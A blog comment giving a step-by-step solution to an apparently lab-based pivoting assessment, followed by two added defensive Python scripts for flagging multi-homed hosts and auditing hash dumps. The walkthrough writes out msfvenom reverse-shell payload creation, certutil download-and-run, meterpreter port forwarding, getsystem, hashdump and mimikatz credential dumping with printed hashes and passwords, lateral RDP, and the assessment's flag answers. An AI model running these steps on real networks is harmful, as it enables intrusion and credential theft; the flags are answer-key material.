2 thoughts on “Pivot, Tunneling, and Port Forwarding Pivot Skill Assessment part 3 The Final count down”

  • ======================================================Bingo

    Discovered open port 3389/tcp on 172.16.5.35

    =========================================================RDP into the Windows Box

    sudo proxychains xfreerdp /v:172.16.5.35 /u:mlefay /p:'Plain Human work!'

    Enumerate the internal network and discover another active host. Submit the IP address of that host as the answer.

    172.16.5.35

    Use the information you gathered to pivot to the discovered host. Submit the contents of C:\Flag.txt as the answer.

    S1ngl3-Piv07-3@sy-Day

    C:\Users\mlefay\.ssh

    ==========================================================On 10-28-2023: next, make a port forwarding rule so any traffic this meterpreter session receives goes to our attack box

    For port forwarding issues, refer to https://www.offsec.com/metasploit-unleashed/portfwd/

    portfwd add -R -l 8081 -p 1234 -L 10.10.16.41

    [*] Local TCP relay created: 10.129.201.127:8081 <-> :1234

    ===========================================================Setup another reverse tcp listener

    meterpreter > bg

    [*] Backgrounding session 1...

    use multi/handler

    msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

    payload => windows/x64/meterpreter/reverse_tcp

    msf6 exploit(multi/handler) > set LPORT 8081

    LPORT => 8081

    msf6 exploit(multi/handler) > set LHOST 0.0.0.0

    LHOST => 0.0.0.0

    msf6 exploit(multi/handler) > run

    [*] Started reverse TCP handler on 0.0.0.0:8081

    ============================================================Next make your payload

    [!bash!]$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.15 -f exe -o backupscript2.exe LPORT=1234

    [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload

    [-] No arch selected, selecting arch: x64 from the payload

    No encoder specified, outputting raw payload

    Payload size: 510 bytes

    Final size of exe file: 7168 bytes

    Saved as: backupscript.exe

    python3 -m http.server 8000

    ==========================================================Transfer to ubuntu and after to the windows box

    wget http://10.10.16.41:8000/backupscript2.exe

    chmod +x backupscript2.exe

    =========================================================From the ubuntu box to the windows box

    Python Server

    python3 -m http.server 8000

    ==========================================================From RDP session on windows box

    Python victim

    certutil -urlcache -f http://172.16.5.15:8000/backupscript2.exe backupscript2.exe

    make tmp dir

    mkdir tmp

    ./backupscript2.exe

    ===========================================================You should have a meterpreter connection; dump the passwords on the attack box

    msf6 exploit(multi/handler) > run

    [*] Started reverse TCP handler on 0.0.0.0:8081

    [*] Sending stage (200774 bytes) to 10.10.16.41

    [*] Meterpreter session 2 opened (10.10.16.41:8081 -> 10.10.16.41:33475) at 2023-10-28 21:15:45 -0400

    meterpreter > shell

    Process 2336 created.

    Channel 1 created.

    Microsoft Windows [Version 10.0.17763.1637]

    (c) 2018 Microsoft Corporation. All rights reserved.

    C:\>

    meterpreter > whoami

    [-] Unknown command: whoami

    meterpreter > getuid

    Server username: PIVOT-SRV01\mlefay

    meterpreter > hashdump

    Administrator:500:aad3b435b51404eeaad3b435b51404ee:bdaffbfe64f1fc646a3353be1c2c3c99:::

    apendragon:1002:aad3b435b51404eeaad3b435b51404ee:222007372da023ed0cdf0a4606bf9b23:::

    DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

    mlefay:1003:aad3b435b51404eeaad3b435b51404ee:2831bf1e4e0841d882328d5481fb5c92:::

    WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4b4ba140ac0767077aee1958e7f78070:::

    meterpreter >

    =================================================================Upgrade your privileges

    meterpreter > getsystem

    ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

    meterpreter > getuid

    Server username: NT AUTHORITY\SYSTEM

    load kiwi

    =======================================================================Get creds creds_all

    creds_all

    https://www.hackers-arise.com/post/2018/11/26/metasploit-basics-part-21-post-exploitation-with-mimikatz

    ========Do you need this? To upgrade to an x64 session, check

    msv credentials

    ===============

    Username Domain NTLM SHA1 DPAPI

    -------- ------ ---- ---- -----

    PIVOT-SRV01$ INLANEFREIGHT 21ce18b1a025d4b0b01c0e716e99d476 0f6097d8c745b1addfdfbbe733c1948e5d929527

    mlefay PIVOT-SRV01 2831bf1e4e0841d882328d5481fb5c92 ccb38ae19c47a04fa01542f30466d6c48ddc18d7

    vfrank INLANEFREIGHT 2e16a00be74fa0bf862b4256d0347e83 b055c7614a5520ea0fc1184ac02c88096e447e0b 97ead6d940822b2c57b18885ffcc5fb4

    wdigest credentials

    ===================

    Username Domain Password

    -------- ------ --------

    (null) (null) (null)

    PIVOT-SRV01$ INLANEFREIGHT (null)

    mlefay PIVOT-SRV01 (null)

    vfrank INLANEFREIGHT (null)

    kerberos credentials

    ====================

    Username Domain Password

    -------- ------ --------

    (null) (null) (null)

    PIVOT-SRV01$ INLANEFREIGHT.LOCAL z4PN$Qc?h1n'mI`r<dzJ:-S?dbm.tA:ANPnGG]1h8,Gb[#Gx`SJj3DOBCwhJW^LMUKkPQb!(P9<$VDLWL+UL4KDZ&lh^Z_[OEj;Is4= 1GOR+3h<U/a[Q7#

    mlefay PIVOT-SRV01 (null)

    pivot-srv01$ INLANEFREIGHT.LOCAL z4PN$Qc?h1n'mI`r<dzJ:-S?dbm.tA:ANPnGG]1h8,Gb[#Gx`SJj3DOBCwhJW^LMUKkPQb!(P9<$VDLWL+UL4KDZ&lh^Z_[OEj;Is4= 1GOR+3h<U/a[Q7#

    vfrank INLANEFREIGHT.LOCAL Imply wet Unmasked!

    ==================================From the RDP session we noticed, by running ipconfig, that Server01 has access to another network

    PS C:\tmp> arp -a

    Interface: 172.16.5.35 --- 0x4

    Internet Address Physical Address Type

    172.16.5.15 00-50-56-b9-90-70 dynamic

    172.16.255.255 ff-ff-ff-ff-ff-ff static

    224.0.0.22 01-00-5e-00-00-16 static

    224.0.0.251 01-00-5e-00-00-fb static

    224.0.0.252 01-00-5e-00-00-fc static

    Interface: 172.16.6.35 --- 0x5

    Internet Address Physical Address Type

    172.16.255.255 ff-ff-ff-ff-ff-ff static

    224.0.0.22 01-00-5e-00-00-16 static

    224.0.0.251 01-00-5e-00-00-fb static

    224.0.0.252 01-00-5e-00-00-fc static

    PS C:\tmp> ipconfig

    Windows IP Configuration

    Ethernet adapter Ethernet0:

    Connection-specific DNS Suffix . :

    Link-local IPv6 Address . . . . . : fe80::cd4d:c90e:a5c:8122%4

    IPv4 Address. . . . . . . . . . . : 172.16.5.35

    Subnet Mask . . . . . . . . . . . : 255.255.0.0

    Default Gateway . . . . . . . . . : 172.16.5.1

    Ethernet adapter Ethernet1 2:

    Connection-specific DNS Suffix . :

    Link-local IPv6 Address . . . . . : fe80::1cac:883e:2e2f:4d3c%5

    IPv4 Address. . . . . . . . . . . : 172.16.6.35

    Subnet Mask . . . . . . . . . . . : 255.255.0.0

    Default Gateway . . . . . . . . . :

    PS C:\tmp>

    ========================Do a ping scan with PowerShell

    1..254 | % {"172.16.6.$($_): $(Test-Connection -count 1 -comp 172.16.6.$($_) -quiet)"}

    ===============Per some blog I found that the last box is 172.16.6.25

    PS C:\Windows\system32> ping 172.16.6.25

    Pinging 172.16.6.25 with 32 bytes of data:

    Reply from 172.16.5.35: Destination host unreachable.

    Reply from 172.16.6.25: bytes=32 time=1ms TTL=128

    Reply from 172.16.6.25: bytes=32 time<1ms TTL=128

    Reply from 172.16.6.25: bytes=32 time<1ms TTL=128

    Ping statistics for 172.16.6.25:

    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

    Approximate round trip times in milli-seconds:

    Minimum = 0ms, Maximum = 1ms, Average = 0ms

    PS C:\Windows\system32>

    ==================================Use mimikatz to get the password

    Try to RDP into 172.16.6.25 with the creds below from the 172.16.5.35 box

    user: vfrank , pass: Imply wet Unmasked!

    ========================================From VFRANK session on 172.16.6.25 RDP session

    FIND FLAG ON WINDOWS 10 BOX

    N3tw0rk-H0pp1ng-f0R-FuN

    PER ACTIVE DIRECTORY THE DOMAIN CONTROLLER IS ACADEMY-PIVOT-D

    PS C:\Users\vfrank> nslookup ACADEMY-PIVOT-D

    DNS request timed out.

    timeout was 2 seconds.

    Server: UnKnown

    Address: 172.16.10.5

    * UnKnown can't find ACADEMY-PIVOT-D: Non-existent domain

    PS C:\Users\vfrank> ping 172.16.10.5

    Pinging 172.16.10.5 with 32 bytes of data:

    Reply from 172.16.10.5: bytes=32 time=3ms TTL=128

    Reply from 172.16.10.5: bytes=32 time<1ms TTL=128

    Reply from 172.16.10.5: bytes=32 time<1ms TTL=128

    Ping statistics for 172.16.10.5:

    Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),

    Approximate round trip times in milli-seconds:

    Minimum = 0ms, Maximum = 3ms, Average = 1ms

    Control-C

    PS C:\Users\vfrank> ipconfig

    Windows IP Configuration

    ===========================================RDP session with 172.16.6.25

    Flag on DC: check mapped drives and click on the DC mapped drive

    Submit the contents of C:\Flag.txt located on the Domain Controller.

    3nd-0xf-Th3-R@inbow!

    Note that the DC is probably 172.16.10.5, but we found the flag
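The commenter above spots the second network by reading `ipconfig` on the RDP'd host by hand. From a defender's side the same signal (a host with more than one IPv4 interface, i.e. a machine that bridges segments and is a natural pivot point) is worth pulling out of `ipconfig` output automatically during asset review. The following Python is an added example, not code from the post or from HTB; the sample output is constructed to mirror the dual-homed layout shown above, and the adapter names and addresses are assumptions for the demo.

```python
"""Parse Windows ``ipconfig`` output and flag multi-homed hosts.

Added example (not from the original post). A host carrying IPv4 addresses
on more than one adapter straddles network segments; defenders want an
inventory of such machines because they are exactly what an intruder uses
to hop from one segment to the next.
"""
import ipaddress
import re
from typing import Dict, List, Optional

# Constructed sample in the shape of ``ipconfig`` output on a dual-homed
# Windows host (adapter names, addresses and masks are made up for the demo).
SAMPLE_IPCONFIG = """\
Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::1%4
   IPv4 Address. . . . . . . . . . . : 172.16.5.35
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 172.16.5.1

Ethernet adapter Ethernet1 2:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::2%5
   IPv4 Address. . . . . . . . . . . : 172.16.6.35
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . :
"""

# "Ethernet adapter Ethernet1 2:" -> adapter name "Ethernet1 2"
ADAPTER_RE = re.compile(r"^\S.*adapter (.+):\s*$")
# "   IPv4 Address. . . . . : 172.16.5.35" -> ("IPv4 Address", "172.16.5.35")
FIELD_RE = re.compile(
    r"^\s*(IPv4 Address|Subnet Mask|Default Gateway)[ .]*:\s*(\S*)\s*$"
)


def parse_ipconfig(text: str) -> Dict[str, Dict[str, str]]:
    """Map each adapter name to the IPv4 fields found under it."""
    adapters: Dict[str, Dict[str, str]] = {}
    current: Optional[str] = None
    for line in text.splitlines():
        m = ADAPTER_RE.match(line)
        if m:
            current = m.group(1)
            adapters[current] = {}
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            adapters[current][m.group(1)] = m.group(2)
    return adapters


def ipv4_interfaces(adapters: Dict[str, Dict[str, str]]) -> List[dict]:
    """Keep only adapters that actually have an IPv4 address and mask,
    and compute the network each one sits on."""
    out = []
    for name, fields in adapters.items():
        ip, mask = fields.get("IPv4 Address"), fields.get("Subnet Mask")
        if not ip or not mask:
            continue
        net = ipaddress.IPv4Network(f"{ip}/{mask}", strict=False)
        out.append({
            "adapter": name,
            "ip": ip,
            "network": str(net),
            # An empty gateway field means the interface is link-only.
            "gateway": fields.get("Default Gateway") or None,
        })
    return out


def is_multihomed(adapters: Dict[str, Dict[str, str]]) -> bool:
    """True when the host has IPv4 on more than one adapter."""
    return len(ipv4_interfaces(adapters)) > 1


def overlapping_networks(interfaces: List[dict]) -> bool:
    """True when two interfaces' networks overlap (e.g. two /16 masks that
    both cover 172.16.0.0/16): a misconfiguration worth flagging on its own,
    since routing between the two 'segments' then depends on interface order."""
    nets = [ipaddress.IPv4Network(i["network"]) for i in interfaces]
    return any(a.overlaps(b) for idx, a in enumerate(nets) for b in nets[idx + 1:])


if __name__ == "__main__":
    found = parse_ipconfig(SAMPLE_IPCONFIG)
    ifaces = ipv4_interfaces(found)
    print("multi-homed:", is_multihomed(found))
    for i in ifaces:
        print(f"  {i['adapter']}: {i['ip']} on {i['network']} gw={i['gateway']}")
    print("overlapping networks:", overlapping_networks(ifaces))
```

Running it over the constructed sample reports the host as multi-homed and also flags that both adapters, with their 255.255.0.0 masks, land on the same 172.16.0.0/16 network; that mirrors the page's own `ipconfig` listing and explains the "Destination host unreachable" reply that precedes the successful pings above.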
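The `hashdump` listing in the comment above is in pwdump format (`user:rid:LM:NT:::`). Two of its values are well-known constants: `aad3b435b51404eeaad3b435b51404ee` is the LM hash of an empty string (what Windows stores when LM hashing is disabled) and `31d6cfe0d16ae931b73c59d7e0c089c0` is the NT hash of an empty password. An auditor reviewing such a dump after an engagement wants those states called out, along with local accounts that share one NT hash (password reuse across hosts). The Python below is an added example, not code from the post or from Metasploit; the sample lines are constructed, and every hash other than the two published constants is a placeholder, not real credential material.

```python
"""Audit a pwdump-style ``hashdump`` listing for weak account states.

Added example (not from the original post). Checks: empty password (NT hash
of ""), LM hash still stored, and the same NT hash shared by several users.
"""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Published constants: LM hash of the empty string (also stored when LM
# hashing is disabled) and NT hash of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in pwdump format. The hashes other than EMPTY_LM and
# EMPTY_NT are placeholders made up for this demo.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:fedcba9876543210fedcba9876543210:00112233445566778899aabbccddeeff:::
helpdesk:1002:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""

PWDUMP_RE = re.compile(
    r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$"
)


def parse_hashdump(text: str) -> List[Dict[str, object]]:
    """Parse pwdump lines; lines that do not match the format are skipped."""
    rows = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if not m:
            continue
        rows.append({
            "user": m.group(1),
            "rid": int(m.group(2)),
            "lm": m.group(3).lower(),
            "nt": m.group(4).lower(),
        })
    return rows


def audit_hashdump(rows: List[Dict[str, object]]) -> List[Tuple[str, str]]:
    """Return (user, finding-code) pairs for every weak state found."""
    findings: List[Tuple[str, str]] = []
    by_nt: Dict[str, List[str]] = defaultdict(list)
    for r in rows:
        user, lm, nt = str(r["user"]), str(r["lm"]), str(r["nt"])
        if nt == EMPTY_NT:
            findings.append((user, "empty-password"))
        if lm != EMPTY_LM:
            # A real LM hash means the weak LM scheme is still enabled for
            # this account (or the password was set before it was disabled).
            findings.append((user, "lm-hash-stored"))
        by_nt[nt].append(user)
    # Non-empty NT hashes shared by more than one account = identical passwords.
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            for user in users:
                findings.append((user, "nt-hash-reused"))
    return findings


if __name__ == "__main__":
    for user, code in audit_hashdump(parse_hashdump(SAMPLE_HASHDUMP)):
        print(f"{user}: {code}")
```

On the constructed sample the audit reports Guest and DefaultAccount as empty-password (both are disabled built-ins by default, as they are in the page's dump too), svc_backup as still carrying an LM hash, and Administrator and helpdesk as sharing one NT hash. The LM column of every line in the page's own dump is the empty-string constant, which is the expected state on a modern host.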
